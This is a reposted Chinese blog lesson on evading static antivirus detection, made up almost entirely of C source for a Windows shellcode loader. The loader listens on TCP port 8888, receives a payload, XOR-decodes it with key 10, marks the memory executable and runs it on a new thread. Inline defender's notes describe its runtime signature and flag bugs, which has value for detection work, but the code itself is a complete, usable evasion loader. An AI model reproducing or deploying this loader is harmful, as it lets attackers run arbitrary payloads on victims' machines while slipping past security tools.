静态恶意代码逃逸(第五课)
该程序是一个基于Windows的网络服务程序,通过WinSock库创建TCP服务器,监听8888端口,接收客户端发送的数据,并将其作为Shellcode在内存中解密后执行. 2019-11-10 00:0:0 Author: payloads.online(查看原文) 阅读量:0 收藏

#include <WinSock2.h>
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#pragma comment(lib,"ws2_32.lib")

/*
 * Copy `code` into a freshly allocated private region, decode it in place
 * (each byte XORed with 10), mark the region executable, and run it on a new
 * thread, blocking until that thread exits.
 *
 * Defender's note: the sequence VirtualAlloc(PAGE_READWRITE) -> in-memory byte
 * decode -> VirtualProtect(PAGE_EXECUTE) -> CreateThread(start address inside
 * that region) is the recognizable runtime shape of this loader, independent of
 * how the bytes look on disk or on the wire. The RW->X protection change on
 * non-image memory and a thread whose start address is not backed by any
 * loaded module are the behaviors worth alerting on.
 *
 * Parameters:
 *   code      - buffer whose bytes are XOR-obfuscated with key 10 (0x0A)
 *   dwCodeLen - number of bytes in `code` to copy, decode and execute
 * Returns TRUE unconditionally; no Win32 call result is checked, so a failed
 * allocation or protection change is neither detected nor reported.
 */
BOOL RunCode(CHAR * code,DWORD dwCodeLen)
{
    HANDLE hThread;
    DWORD dwOldProtect;
    DWORD dwThreadId;
    // Private, committed, read/write region; return value is not checked.
    PCHAR pszShellcode = (PCHAR)VirtualAlloc(NULL,dwCodeLen,MEM_COMMIT,PAGE_READWRITE);
    CopyMemory(pszShellcode,code,dwCodeLen);

    // In-place decode: every byte is XORed with the constant 10.
    for(DWORD i = 0;i< dwCodeLen; i++){
            _InterlockedXor8(pszShellcode+i,10);
    }
    // From here the region's protection is changed to executable
        VirtualProtect(pszShellcode,dwCodeLen,PAGE_EXECUTE,&dwOldProtect);
        // Execute the decoded bytes as a thread start routine
        hThread = CreateThread(
            NULL, // security attributes
            NULL, // stack size
            (LPTHREAD_START_ROUTINE)pszShellcode, // start routine
            NULL, // parameter
            NULL, // creation flags
            &dwThreadId // thread ID
        );
        // Block until the thread finishes; hThread is never closed.
        WaitForSingleObject(hThread,INFINITE);
        return TRUE;
}

/*
 * Program entry point. Starts a TCP listener on every interface (INADDR_ANY),
 * port 8888, accepts a single client, reads at most 801 bytes from it, tears
 * the sockets down and hands the buffer to RunCode().
 *
 * Defender's note: there is no authentication or integrity check on the
 * connection, so whatever reaches this port is what gets executed. A process
 * that opens a listening socket, performs exactly one recv(), and then
 * transitions private memory to executable is a strong behavioral indicator
 * for this kind of staged loader. Note also that the full 801-byte buffer is
 * passed to RunCode() (sizeof(buf), not `ret`), so bytes beyond what was
 * received are whatever was on the stack - `buf` is never initialized.
 *
 * Returns the Winsock/GetLastError() code on setup failure, otherwise 0.
 */
int wmain(int argc, TCHAR argv[]){
    CHAR buf[801];
    DWORD dwError;
    WORD sockVersion = MAKEWORD(2, 2);
    WSADATA wsaData;
    SOCKET socks;
    SOCKET sClient;
    struct sockaddr_in s_client;
    INT nAddrLen = sizeof(s_client);
    SHORT sListenPort = 8888;
    struct sockaddr_in sin;

    if (WSAStartup(sockVersion, &wsaData) != 0)
    {
        dwError = GetLastError();
        printf("[*]WSAStarup Error : %d \n",dwError);
        return dwError;
    }

    socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (socks == INVALID_SOCKET)
    {
        dwError = GetLastError();
        printf("[*]Socket Error : %d \n",dwError);
        return dwError;
    }

    // Bind to all local interfaces on port 8888.
    sin.sin_family = AF_INET;
    sin.sin_port = htons(sListenPort);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;

    if(bind(socks,(struct sockaddr *)&sin,sizeof(sin)) == SOCKET_ERROR )
    {
        dwError = GetLastError();
        printf("[*]Bind Error : %d \n",dwError);
        return dwError;
    }

    if (listen(socks, 5) == SOCKET_ERROR)
    {
        dwError = GetLastError();
        printf("[*]Listen  Error : %d \n",dwError);
        return dwError;
    }

    // One client, one recv(): the accept() result is not checked.
    sClient = accept(socks, (SOCKADDR *)&s_client, &nAddrLen);
    int ret = recv(sClient,buf,sizeof(buf),0);
    if (ret > 0)
    {
        printf("[+]Recv %d-Bytes \n",ret);
        // Sockets are closed only on a successful read.
        closesocket(sClient);
        closesocket(socks);
    }

    WSACleanup();
    // Runs regardless of `ret`, and with the whole buffer rather than `ret` bytes.
    RunCode(buf,sizeof(buf));
    return 0;
}

文章来源: https://payloads.online/archivers/2019-11-10/5/